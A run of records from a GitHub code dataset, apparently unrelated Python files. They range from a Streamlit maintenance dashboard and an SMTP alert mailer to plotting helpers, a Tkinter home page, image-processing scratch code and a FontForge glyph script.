\"\"\"\n main\n \"\"\"\n\n satis_estacoes = query_gbq(\n \"\"\"\n select \n t1.*,\n trim(split(seriedade, '(')[safe_offset(0)]) seriedade_simples,\n t2.nome_exibicao_responsavel\n from `rj-smtr.brt_manutencao.questionario_recentes` t1\n join `rj-smtr.brt_manutencao.responsaveis` t2\n on t1.id_responsavel = t2.id_responsavel\n \"\"\",\n update=3,\n )\n\n satis_estacoes[\"nome_problema_simples\"] = satis_estacoes[\"nome_problema\"].apply(\n lambda x: x.split(\"(\")[0]\n )\n\n responsavel = st.selectbox(\n \"Selecione um responsavel\",\n satis_estacoes[\"nome_exibicao_responsavel\"].sort_values().unique(),\n )\n\n nome_problema = st.selectbox(\n \"Selecione um problema\",\n satis_estacoes.query(f\"nome_exibicao_responsavel == '{responsavel}'\")[\n \"nome_problema_simples\"\n ]\n .sort_values()\n .unique(),\n )\n\n problema = satis_estacoes.query(\n f\"nome_exibicao_responsavel == '{responsavel}'\"\n ).query(f'nome_problema_simples == \"{nome_problema}\"')\n\n st.subheader(\"Avaliações\")\n\n filterby = [\"Urgência\", \"Insatisfatório\"]\n problemas_selecionados = problema[problema[\"seriedade_simples\"].isin(filterby)]\n\n if len(problemas_selecionados):\n\n st.dataframe(\n problemas_selecionados.groupby(\"seriedade_simples\")\n .count()[[\"dt\"]]\n .T.assign(hack=\"\")\n .set_index(\"hack\")\n )\n\n entorno = (\n problemas_selecionados.query('categoria_problema == \"Externo\"')\n .rename(\n columns={\n \"nome_estacao\": \"Estação\",\n \"seriedade_simples\": \"Status\",\n }\n )\n .sort_values(by=\"Status\", ascending=False)\n .set_index(\"Estação\")[[\"Status\"]]\n )\n\n if len(entorno):\n st.subheader(\"Estação Entorno\")\n\n st.dataframe(highlight_by_column(entorno, \"Status\"))\n\n dentro = (\n problemas_selecionados.query('categoria_problema == \"Interno\"')\n .rename(\n columns={\n \"nome_estacao\": \"Estação\",\n \"seriedade_simples\": \"Status\",\n }\n )\n .sort_values(by=\"Status\", ascending=False)\n .set_index(\"Estação\")[[\"Status\"]]\n )\n\n if len(dentro):\n\n st.subheader(\"Estação Dentro\")\n\n st.dataframe(highlight_by_column(dentro, \"Status\"))\n else:\n\n st.warning(f\"Não existem avaliações negativas\")","repo_name":"RJ-SMTR/brt_avaliacao","sub_path":"app/responsavel.py","file_name":"responsavel.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30881847831","text":"import os, time\nfrom concurrent.futures import ThreadPoolExecutor\n\nprint(\"hi outside of main()\")\n\ndef hello(x):\n print(\"inside hello()\")\n print(\"Proccess id: \", os.getpid())\n time.sleep(3)\n return x*x\n\nif __name__ == \"__main__\":\n with ThreadPoolExecutor(max_workers=3) as executor:\n results = executor.map(hello, range(3))\n for result in results:\n print(result)","repo_name":"huiboz/coding_practice","sub_path":"multiprocess_vs_multithread/multithread_executor.py","file_name":"multithread_executor.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7727737229","text":"class Solution:\n def isValidSudoku(self, board: List[List[str]]) -> bool:\n # check current validity only. not potential validity after filling.\n from collections import defaultdict\n \n rowDict, colDict, squareDict = defaultdict(set), defaultdict(set), defaultdict(set)\n ROWS, COLS = 9, 9\n for row in range(ROWS):\n for col in range(COLS):\n if board[row][col] == '.':\n continue\n if (board[row][col] in rowDict[row]) or (board[row][col] in colDict[col]) or (board[row][col] in squareDict[(row // 3, col // 3)]):\n return False\n rowDict[row].add(board[row][col])\n colDict[col].add(board[row][col])\n squareDict[(row // 3, col // 3)].add(board[row][col])\n return True","repo_name":"ameyxd/leetcode-interview-practice","sub_path":"36-valid-sudoku/36-valid-sudoku.py","file_name":"36-valid-sudoku.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72699314174","text":"import argparse\nimport ctypes\nimport json\nimport sys\nimport struct\n\n\ndef read_string(infile, length, encoding='shift-jis'):\n return infile.read(length).decode(encoding).strip('\\0')\n\ndef write_string(outfile, input, length, fill='\\0', encoding='shift-jis'):\n string_data = input[:length].encode(encoding)\n outfile.write(string_data)\n\n if len(input) < length:\n outfile.write(\"\".join([fill] * (length - len(string_data))).encode(encoding))\n\n# Cannonballers reader/writer\ndef reader_19(infile, song_count):\n song_entries = []\n\n for i in range(song_count):\n title = read_string(infile, 0x40)\n title_ascii = read_string(infile, 0x40)\n genre = read_string(infile, 0x40)\n artist = read_string(infile, 0x40)\n\n texture_title, texture_artist, texture_genre, texture_load, texture_list = struct.unpack(\"= CUR_STYLE_ENTRIES:\n outfile.write(struct.pack(\" Va informam ca masina dumneavoastra \" + car_details['Name'][0] + \"\" + \\\n \" cu descrierea \" + car_details['Description'][0] + \" are urmatoarea alerta:\" \\\n \" \" + alerta + \"\" \\\n + \"
\" \\\n \"


Acesta este un mesaj de alerta generat automat cu scopul de a va informa in privinta \" \\\n \"functionarii masinii dumneavoastra.
\" \\\n + \"Va rugam sa nu faceti reply la acest email!
\"\n\n part1 = MIMEText(text, 'html')\n msg.attach(part1)\n print(\"Message created\")\n server = smtplib.SMTP(self.mail_data['mail_server'], self.mail_data['mail_port'])\n print(\"server created, trying to create connection\")\n server.connect(self.mail_data['mail_server'], self.mail_data['mail_port'])\n print(\"SMTP connected\")\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login(self.mail_data['mail_sender'], password)\n print(\"Logged in, trying to send mail\")\n server.sendmail(self.mail_data['mail_sender'], msg['To'], msg.as_string())\n print(\"Mail sent\")\n server.quit()\n\n def run(self):\n oldStatuses = self.statuses.copy()\n counter = 0\n while True:\n counter = counter + 1\n print('--- Loop number ' + str(counter) + ' ---')\n time.sleep(1)\n self.updateStatuses()\n changes = self.getChanges(oldStatuses)\n if changes['changes_df'].empty:\n print('No changes found')\n # print (self.statuses)\n else:\n print('Change found... Alerting... Please wait')\n iterator = 0\n for id in changes['cars']:\n alerta = changes['changes_df']['to'][iterator]\n print(alerta)\n self.sendMailTo(id + 1, alerta)\n iterator = iterator + 1\n\n oldStatuses = self.statuses.copy()\n\n def getStatuses(self):\n return self.statuses\n\n def printStatuses(self):\n print(self.statuses)\n\n\nif __name__ == \"__main__\":\n alert = Alert()\n alert.printStatuses()\n old = alert.getStatuses().copy()\n old.at[56, 'Status'] = \"ALERT\"\n old.at[2, 'Status'] = \"GOOD\"\n changes = alert.getChanges(old)\n print(changes)\n alert.run()\n","repo_name":"Katzuno/Alert-System","sub_path":"alert_sys.py","file_name":"alert_sys.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14934091298","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom .proc import to_chw, to_hwc\n\ndef show_stats(image, cfirst=False):\n \"\"\"prints statistic for an image\n --------\n image: np.array\n cfirst: bool, use cfirst=True if image format is [c,w,h]\n \"\"\"\n print(f'shape: {image.shape}')\n if not cfirst:\n if len(image.shape) == 2:\n image = np.expand_dims(image, axis=0)\n else:\n image = to_chw(image)\n props = pd.DataFrame({\n 'min': np.nanmin(image, (1,2)),\n 'max': np.nanmax(image, (1,2)),\n 'mean': np.nanmean(image, (1,2)),\n 'std': np.nanstd(image, (1,2)),\n 'pos': np.count_nonzero(np.nan_to_num(image, nan=-1.)>0, (1,2)),\n 'zero': np.count_nonzero(image==0, (1,2)),\n 'neg': np.count_nonzero(np.nan_to_num(image, nan=1.)<0, (1,2)),\n 'nan': np.count_nonzero(np.isnan(image), (1,2)),\n })\n print(props)\n\n\ndef show_hist(image, ax=None, cfirst=False, num_bins=256, start=None, end=None):\n \"\"\"creates histogram for 1-4 channel image\n --------\n image: np.array with [h,w,c]\n ax: plt.axis. Use f,ax = plt.subplots() and feed the ax here\n cfirst: bool. Use cfirst=1 if image is [c,h,w] format\n num_bins: int. default=256\n start: int or float (match image type). If not provided then np.min(image)\n end: default: np.max(image)\n \"\"\"\n color = ['r','g','b','k']\n if start == None: start = np.min(image)\n if end ==None: end = np.max(image)\n \n # if channel first, make it channel last\n if cfirst: image = to_hwc(image)\n # if ax not specified, create one\n if not ax: f,ax = plt.subplots(1,1)\n\n # 1ch image usually have only [w,h] or [w,h,1]\n if len(image.shape)==2 or image.shape[-1]==1:\n ax.hist(image.ravel(), num_bins, [start,end])\n else:\n for i in range(image.shape[-1]):\n ax.hist(image[:,:,i].ravel(), num_bins, [start,end],\n color=color[i], histtype='step', alpha=0.6)\n\n\n### PLOT ###\ndef show_example(img, mask):\n f,ax = plt.subplots(1,2,figsize=(10,5))\n if img.shape[-1] == 1:\n cmap = 'gray'\n else:\n cmap = None\n ax[0].imshow(img, cmap=cmap)\n if len(mask.shape)==3:\n mask = np.squeeze(mask, axis=-1)\n ax[1].imshow(mask, cmap='gray')\n plt.show()\n\ndef plot_metrics(history):\n sns.set(style='whitegrid')\n metric_list = [m for m in list(history.keys()) if m is not 'lr']\n size = len(metric_list)//2 # adjust vertical space to fit all metrics\n fig, axes = plt.subplots(size, 1, sharex='col', figsize=(20, size * 4))\n if size > 1:\n axes = axes.flatten()\n else:\n axes = [axes]\n \n for index in range(len(metric_list)//2):\n metric_name = metric_list[index]\n val_metric_name = metric_list[index+size]\n axes[index].plot(history[metric_name], label='Train %s' % metric_name)\n axes[index].plot(history[val_metric_name], label='Validation %s' % metric_name)\n axes[index].legend(loc='best', fontsize=16)\n axes[index].set_title(metric_name)\n if 'loss' in metric_name:\n axes[index].axvline(np.argmin(history[metric_name]), linestyle='dashed')\n axes[index].axvline(np.argmin(history[val_metric_name]), linestyle='dashed', color='orange')\n else:\n axes[index].axvline(np.argmax(history[metric_name]), linestyle='dashed')\n axes[index].axvline(np.argmax(history[val_metric_name]), linestyle='dashed', color='orange')\n\n plt.xlabel('Epochs', fontsize=16)\n sns.despine()\n plt.show()\n sns.set_theme()\n \n # print model performance\n bm_idx = np.argmin(history['val_loss'])\n print(f'best model at epoch: {bm_idx}')\n v_loss = history['val_loss'][bm_idx]\n v_iou = history[\"val_iou_score\"][bm_idx]\n v_f1 = history[\"val_f1-score\"][bm_idx]\n\n loss = history['loss'][bm_idx]\n iou = history[\"iou_score\"][bm_idx]\n f1 = history[\"f1-score\"][bm_idx]\n\n\n print(f'val loss: {v_loss:.4f}, val iou: {v_iou:.4f}, val f1: {v_f1:.4f}')\n print(f'loss: {loss:.4f}, iou: {iou:.4f}, f1: {f1:.4f}')\n print(f'best val IoU: {np.max(history[\"val_iou_score\"])}')","repo_name":"sandhi-artha/sn6_aug","sub_path":"lib/viz.py","file_name":"viz.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26424283729","text":"from tkinter import *\r\nimport Controller.Flat_Database as FD_M\r\nimport Controller.Bill_Database as BD_M\r\n\r\n\r\nclass Homepage:\r\n def __init__(self, window):\r\n self.window = window\r\n # ------------------Title----------------------\r\n Title = Label(window, text=\"HOME PAGE\", fg='Black', bg=\"#CAE9F5\", font=(\"Helvetica\", 40, 'bold'))\r\n Title.place(x=220, y=10)\r\n\r\n note = Label(window,\r\n text=\"Add titles for both new files 'Flat_Database' & 'Bill_database'. Click the above right buttons to create titles in the database\",\r\n fg='Black', bg=\"#CAE9F5\", font=(\"Helvetica\", 10))\r\n note.place(x=10, y=400)\r\n\r\n create_Flat_data_button = Button(window, text=\"Create title for flat profile\", bg=\"#ADECDF\",\r\n command=self.createFlatDatabase)\r\n create_Flat_data_button.place(x=400, y=200)\r\n\r\n create_bill_data_button = Button(window, text=\"Create title for bill section\", bg=\"#ADECDF\",\r\n command=self.createBilldatabase)\r\n create_bill_data_button.place(x=400, y=240)\r\n\r\n quit_button = Button(window, text=\"Quit\", bg=\"#ADECDF\", command=window.destroy)\r\n quit_button.place(x=400, y=300)\r\n\r\n # -----------------Sections---------------------\r\n lbl = Label(window, text=\"Select a database to visit in the list below:\", bg=\"#CAE9F5\", fg='Black',\r\n font=(\"Helvetica\", 14, 'bold'))\r\n lbl.place(x=10, y=100)\r\n\r\n flat_Profile_btn = Button(window, text=\"Flat Profile\", bg=\"#ADECDF\", fg='blue', command=self.goto_flatProfile)\r\n flat_Profile_btn.place(x=20, y=140)\r\n\r\n Bill_Section_btn = Button(window, text=\"Bill Section\", bg=\"#ADECDF\", fg='blue', command=self.goto_billSection)\r\n Bill_Section_btn.place(x=20, y=180)\r\n\r\n Add_bill_btn = Button(window, text=\"Add Bill\", bg=\"#ADECDF\", fg='blue', command=self.goto_AddBill)\r\n Add_bill_btn.place(x=20, y=220)\r\n\r\n Add_flat_members_btn = Button(window, text=\"Add flat members\", bg=\"#ADECDF\", fg='blue',\r\n command=self.goto_AddMember)\r\n Add_flat_members_btn.place(x=20, y=260)\r\n\r\n Service_Charge_btn = Button(window, text=\"Service Charge\", bg=\"#ADECDF\", fg='blue')\r\n Service_Charge_btn.place(x=20, y=300)\r\n\r\n Maintenance_btn = Button(window, text=\"Maintenance\", bg=\"#ADECDF\", fg='blue')\r\n Maintenance_btn.place(x=20, y=340)\r\n\r\n @staticmethod\r\n def createFlatDatabase():\r\n FD_M.Flat_database_create().add_title()\r\n FD_M.Flat_database_create().save_excel()\r\n\r\n @staticmethod\r\n def createBilldatabase():\r\n BD_M.Bill_database_create().add_title()\r\n BD_M.Bill_database_create().save_excel()\r\n\r\n def goto_flatProfile(self):\r\n self.window.destroy()\r\n\r\n def goto_billSection(self):\r\n self.window.destroy()\r\n\r\n def goto_AddMember(self):\r\n self.window.destroy()\r\n\r\n def goto_AddBill(self):\r\n self.window.destroy()\r\n\r\n\r\ndef present_Homepage_gui_frame():\r\n window = Tk()\r\n Homepage(window)\r\n windowWidth = window.winfo_reqwidth()\r\n windowHeight = window.winfo_reqheight()\r\n\r\n positionRight = int(window.winfo_screenwidth() / 3 - windowWidth / 2)\r\n positionDown = int(window.winfo_screenheight() / 3 - windowHeight / 2)\r\n\r\n window.title('Apartment Management System')\r\n window.geometry(\"840x450+{}+{}\".format(positionRight, positionDown))\r\n window['background'] = '#CAE9F5'\r\n window.mainloop()\r\n\r\n\r\npresent_Homepage_gui_frame()\r\n","repo_name":"IstinubAzad/CSE470-Project-AMS","sub_path":"View/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26509301091","text":"import face_recognition\nface_locations = face_recognition.face_locations(image)\n\n# https://github.com/ageitgey/face_recognition/blob/master/examples/find_faces_in_picture.py\nfrom PIL import Image\n\nprint(\"I found {} face(s) in this photograph.\".format(len(face_locations)))\n\nfor face_location in face_locations:\n\n # Print the location of each face in this image\n top, right, bottom, left = face_location\n print(\"A face is located at pixel location Top: {}, Left: {}, Bottom: {}, Right: {}\".format(top, left, bottom, right))\n\n # You can access the actual face itself like this:\n face_image = image[top:bottom, left:right]\n fig, ax = plt.subplots(1,1, figsize=(5, 5))\n plt.grid(False)\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n ax.imshow(face_image)\n","repo_name":"NAIST-SE/ReuseJupyterNotebook","sub_path":"extracted files example/644036/16880/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10259667538","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 17 13:49:56 2023\n\n@author: andre\n\"\"\"\n\nimport functions\nimport matplotlib.pyplot as plt\nimport time\nimport pandas as pd\nimport numpy as np\nimport joblib\n# Start the timer\nimport os\n\nfrom PIL import Image\n#%%\nstart_time = time.time()\n\ncurrent_directory = os.getcwd()\n\n\nsubdirectory_name = \"plots\"\n\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\nimage_path = os.path.join(subdirectory_path , \"cropped.jpeg\") # Replace with your PNG image path\n\nimage = Image.open(image_path)\nwidth, height = image.size\n\nrows = height \ncols = width\n\nprint(rows, cols)\nmatrix = functions.png_to_matrix(image_path) \ncmap=functions.create_green_to_blue_cmap()\nplt.figure()\nfunctions.plot_heatmap(matrix, cmap, vmin=1, vmax=3)\nplt.show()\n\n\n#fracs = functions.count_value_in_kernel2(matrix, 40)\n\n\nend_time = time.time()\nelapsed_time = end_time - start_time\nprint(f\"Elapsed time: {elapsed_time} seconds\")\n\n\n#%%\n\nfrom PIL import Image\n\ndef png_to_image(image):\n rgb_image = image.convert(\"RGB\")\n width, height = rgb_image.size\n\n output_image = Image.new(\"RGB\", (width, height))\n\n for y in range(height):\n for x in range(width):\n r, g, b = rgb_image.getpixel((x, y))\n \n diff_rg = abs(r - g)\n diff_gb = abs(g - b)\n\n # Categorize the pixel based on the differences\n if diff_rg > 20 and diff_gb > 15:\n if b > max(r, g):\n color = (0, 0, 255) # Blue\n else:\n color = (0, 255, 0) # Green\n else:\n color = (0, 0, 0) # Black\n\n output_image.putpixel((x, y), color)\n\n return output_image\n\n\nurrent_directory = os.getcwd()\n\n\nsubdirectory_name = \"plots\"\n\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\nimage_path = os.path.join(subdirectory_path , \"knipsel2.PNG\") # Replace with your PNG image path\n\nimage = Image.open(image_path)\nwidth, height = image.size\n\nprint(width, height)\n\noutput_image = png_to_image(image)\noutput_image.show() # Display the resulting image\n\n\n#%%\nfrom PIL import Image\n\n\ndef reduce_resolution(image, plate_width , plate_height):\n\n resized_image = image.resize((plate_width, plate_height), resample=Image.NEAREST)\n\n return resized_image\n\nimport numpy as np\nfrom PIL import Image\nfrom scipy.ndimage import median_filter\n\ndef median_filter_pil(image, kernel_size):\n # Convert the PIL image to a NumPy array\n image_array = np.array(image)\n\n # Apply median filtering to the image array\n filtered_array = median_filter(image_array, size=kernel_size)\n \n # Convert the filtered array back to uint8 data type\n filtered_array = filtered_array.astype(np.uint8)\n\n # Convert the filtered array back to a PIL image\n filtered_image = Image.fromarray(filtered_array)\n\n return filtered_image\n\ndef median_filter_custom(image, kernel_size):\n # Create a copy of the original image\n filtered_image = image.copy()\n\n # Get the dimensions of the image\n width, height = image.size\n\n # Calculate the padding size for the kernel\n padding = kernel_size // 2\n\n # Iterate over each pixel in the image\n for y in range(padding, height - padding):\n for x in range(padding, width - padding):\n # Extract the neighborhood around the current pixel\n neighborhood = image.crop((x - padding, y - padding, x + padding + 1, y + padding + 1))\n\n # Get the pixel values within the neighborhood\n pixels = list(neighborhood.getdata())\n\n # Calculate the median value within the neighborhood\n median = sorted(pixels)[len(pixels) // 2]\n\n # Set the pixel value in the filtered image to the median\n filtered_image.putpixel((x, y), median)\n\n return filtered_image\n\nnew_ = reduce_resolution(output_image, 320 , 320)\nnew_.show()\nnew_=median_filter_custom(new_, 6)\nnew_.show()\nnew_ = reduce_resolution(new_, 16 , 16)\nnew_.show()\n\n#%%\n\ndef png_to_image2(image):\n rgb_image = image.convert(\"RGB\")\n width, height = rgb_image.size\n \n print(width, height)\n\n output_image = Image.new(\"RGB\", (width, height))\n\n for y in range(height):\n for x in range(width):\n r, g, b = rgb_image.getpixel((x, y))\n #print(r, g, b)\n \n diff_rg = abs(r - g)\n diff_gb = abs(g - b)\n #print(diff_rg, diff_rg, r, g, b)\n\n # Categorize the pixel based on the differences\n if diff_gb > 30:\n if b > max(r, g):\n color = (0, 0, 255) # Blue\n else:\n color = (0, 255, 0) # Green\n else:\n color = (0, 0, 0) # Black\n\n output_image.putpixel((x, y), color)\n\n return output_image\n\noutput_image2 = png_to_image2(new_)\noutput_image2.show() \n\n#%%\n\n\n\ndf_vlinder = pd.read_csv(os.path.join(subdirectory_path,'big_2020_09.csv' ))\ndf_vlinder=df_vlinder[df_vlinder['Vlinder']=='vlinder05']\ndf_vlinder=df_vlinder.reset_index(drop=True)\nplt.figure()\ndf_vlinder.PRECIP_QUANTITY.plot()\nplt.figure()\ndf_vlinder.t2m_inca.plot()\nplt.figure()\ndf_vlinder.wind_speed_inca.plot()\n\n\n#%%\nimport functions\n\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"knipsel2.PNG\") # Replace with your PNG image path\n\nimage = Image.open(image_path)\nplot = functions.run_module(image, 4)\nplot.show()\n\n\n\n\n\n#%%%\n\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"new_firas4.png\") \n\nimage = Image.open(image_path)\nimage.show()\nfrom PIL import Image\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray\n\ndef edge_detection(image):\n # Convert the image to grayscale\n gray_image = image.convert('L')\n\n # Convert PIL image to NumPy array\n image_array = np.array(gray_image)\n\n # Convert grayscale image to RGB by duplicating the single channel\n image_rgb = np.stack((image_array,) * 3, axis=-1)\n\n # Perform Canny edge detection\n edges = canny(rgb2gray(image_rgb))\n\n # Convert the edges array back to PIL image\n edges_image = Image.fromarray(edges.astype('uint8') * 255)\n\n return edges_image\n\n\ned = edge_detection(image)\ned.show()\n\n\nfrom PIL import Image, ImageOps, ImageDraw\n\ndef remove_region_within_edges(image, edges):\n # Convert the edges image to grayscale\n edges_gray = edges.convert('L')\n\n # Create a blank mask image with the same size as the edges\n mask = Image.new('L', edges_gray.size, 0)\n\n # Draw the region within the edges on the mask\n draw = ImageDraw.Draw(mask)\n draw.polygon(edges_gray.getbbox(), fill=255)\n\n # Apply the mask to the original image\n result = Image.composite(image, Image.new('RGB', image.size), mask)\n\n return result\n\n\nremove_object_with_edges(image, ed).show()\n\n\n#%%\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"new_firas2.png\") \n\nimport cv2\nimport numpy as np\n\ndef extract_object(image_path):\n # Load the image\n image = cv2.imread(image_path)\n\n # Convert the image from BGR to HSV color space\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n # Define the lower and upper bounds for the object color in HSV\n lower_color = np.array([0, 50, 50]) # Adjust these values based on the object color\n upper_color = np.array([360, 255, 255]) # Adjust these values based on the object color\n\n # Create a mask for the object using color segmentation\n mask = cv2.inRange(hsv, lower_color, upper_color)\n\n # Apply the mask to the original image\n extracted_object = cv2.bitwise_and(image, image, mask=mask)\n\n return extracted_object\n\n# Example usage\nextracted_image = extract_object(image_path)\ncv2.imshow('Extracted Object', extracted_image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n#%%\n\n\n\nimport cv2\nimport numpy as np\n\ndef remove_white_object(image, threshold):\n # Convert PIL image to OpenCV format\n image_cv = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)\n\n # Convert image to grayscale\n gray_image = cv2.cvtColor(image_cv, cv2.COLOR_BGR2GRAY)\n\n # Create a binary mask of white pixels\n _, mask = cv2.threshold(gray_image, threshold, 255, cv2.THRESH_BINARY)\n\n # Perform inpainting\n result = cv2.inpaint(image_cv, mask, 3, cv2.INPAINT_TELEA)\n\n # Convert back to PIL image format\n result_pil = Image.fromarray(cv2.cvtColor(result, cv2.COLOR_BGR2RGB))\n\n return result_pil\n\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"new_firas.png\") \n\nimage = Image.open(image_path)\nimage.show()\n\nremove_white_object(image, 150).show()\n\n\n\n#%%%\n\n\n\nimport cv2\nimport numpy as np\n\ndef warp_colored_region(image):\n # Convert image to HSV color space\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n # Define lower and upper color thresholds for color-based segmentation\n lower_color = np.array([0, 50, 50]) # Adjust these values based on the color range of the region\n upper_color = np.array([30, 255, 255]) # Adjust these values based on the color range of the region\n\n # Create a mask of the colored region using color segmentation\n mask = cv2.inRange(hsv, lower_color, upper_color)\n\n # Find contours in the mask\n contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n # Find the largest contour (assuming it represents the colored region)\n largest_contour = max(contours, key=cv2.contourArea)\n\n # Find the four corners of the largest contour\n epsilon = 0.1 * cv2.arcLength(largest_contour, True)\n corners = cv2.approxPolyDP(largest_contour, epsilon, True)\n print(corners)\n if len(corners) >= 4:\n # Create a target square shape for warping\n target_size = 500 # Adjust the size as desired\n target_shape = np.float32([[0, 0], [target_size, 0], [target_size, target_size], [0, target_size]])\n\n # Find the perspective transformation matrix using homography\n transform_matrix, _ = cv2.findHomography(corners, target_shape)\n\n # Warp the image into the square format\n warped_image = cv2.warpPerspective(image, transform_matrix, (target_size, target_size))\n\n return warped_image\n else:\n print(\"Insufficient corners detected. Unable to warp the image.\")\n return None\n\n# Example usage\ncurrent_directory = os.getcwd()\nsubdirectory_name = \"plots\"\n# Create the path to the subdirectory\nsubdirectory_path = os.path.join(current_directory, subdirectory_name)\n\n# Example usage\nimage_path = os.path.join(subdirectory_path , \"new_firas3.png\") \nimage = cv2.imread(image_path)\nwarped_image = warp_colored_region(image)\nif warped_image is not None:\n cv2.imshow('Warped Image', warped_image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\n\n\n\n#%%\n\n\n\n\n","repo_name":"ACovaci99/I_Love_Science_Fest","sub_path":"back_end/develop_script.py","file_name":"develop_script.py","file_ext":"py","file_size_in_byte":11497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71334055615","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom read_prep_data import curved_power_law, power_law\nfrom scipy.stats import chi2\nplt.rcParams[\"font.family\"] = \"serif\"\nplt.rcParams[\"axes.grid\"] = False\n\nmajorticklength=2.5\nminorticklength=2\ntickwidth=0.5\n\ndef plot_sed(freq, flux, fluxerr, fit_params, coord_src, outpath):\n fig, ax = plt.subplots(1,1)\n\n nu = np.geomspace(\n np.min(freq),\n np.max(freq),\n 100\n )\n\n ax.errorbar(\n freq,\n flux,\n yerr=fluxerr,\n ls='None',\n marker='.'\n )\n\n legend = False\n\n if fit_params is not None:\n legend = True\n \n if len(fit_params) == 2:\n\n ax.plot(\n nu,\n power_law(nu, *fit_params),\n ls='--',\n color='red',\n label=f\"Power-law, r$\\alpha$ {fit_params[1]:.3f}\"\n )\n elif len(fit_params) == 3: \n ax.plot(\n nu,\n curved_power_law(nu, *fit_params),\n ls=':',\n color='green',\n label=f'Curved power-law, r$q$ {fit_params[2]:.3f}'\n )\n\n\n if legend is True:\n ax.legend()\n\n ax.loglog()\n ax.set(\n xlabel='Frequency (MHz)',\n ylabel='Integrated Flux (Jy)',\n title=coord_src.tex\n )\n ax.tick_params(\n axis=\"both\", which=\"major\", direction=\"in\", length=majorticklength, width=tickwidth, pad=5\n )\n ax.tick_params(\n axis=\"both\", which=\"minor\", direction=\"in\", length=minorticklength, width=tickwidth\n )\n\n fig.tight_layout()\n fig.savefig(f\"{outpath}/{coord_src}.png\")\n plt.close(fig)\n","repo_name":"astrokatross/drII_plotting","sub_path":"sed_plotting/plotting_seds.py","file_name":"plotting_seds.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20187809322","text":"#!/usr/bin/env python2\n#coding: utf-8\n\nimport fontforge;\nimport psMat;\n\nbhat_consonants = [\"a\", \"ta\", \"ka\", \"xa\", \"sa\", \"na\", \"ma\", \"da\", \"ga\", \"pa\", \"ba\", \"ha\", \"ca\", \"za\", \"la\", \"ra\", \"ja\", \"ya\", \"wa\", \"dha\", \"kha\", \"gha\", \"pha\", \"bha\", \"tra\", \"dra\", \"nra\", \"lra\", \"cra\"];\nbhat_vowels = [\"i\", \"u\", \"aa\", \"ii\", \"uu\", \"e\" ,\"o\", \"ai\", \"au\", \"novowel\"];\n\ngldir = \"../Traditional/glyphs\"\n\ndef create_characters(font):\n for cp in range(0x0000, 0x0080): #基本ラテン字\n font.createChar(cp);\n\n for cp in [0x1e0c, 0x1e0d, 0x1e36, 0x1e37, 0x1e46, 0x1e47, 0x1e62, 0x1e63, 0x1e6c, 0x1e6d, 0x00c1, 0x00cd, 0x00da, 0x00e1, 0x00ed, 0x00fa]:\n font.createChar(cp);\n\ndef create(font): \n for cp in bhat_consonants: \n font.createChar(-1, \"bhat_%s\" % cp);\n font[\"bhat_%s\" % cp].importOutlines(\"%s/%s.svg\" % (gldir, cp));\n font[\"bhat_%s\" % cp].right_side_bearing = 0;\n font[\"bhat_%s\" % cp].left_side_bearing = 0;\n\n for cp in bhat_vowels:\n font.createChar(-1, \"bhat_%s_mark\" % cp);\n font[\"bhat_%s_mark\" % cp].importOutlines(\"%s/%s.svg\" % (gldir, cp));\n font[\"bhat_%s_mark\" % cp].right_side_bearing = 0;\n font[\"bhat_%s_mark\" % cp].left_side_bearing = 0;\n\n bar_left = {\"i\": 270.06, \"ii\": 350.75,\"au\": 530.06}\n \n for cns in bhat_consonants:\n for vwl in bhat_vowels:\n if vwl == \"a\":\n pass;\n 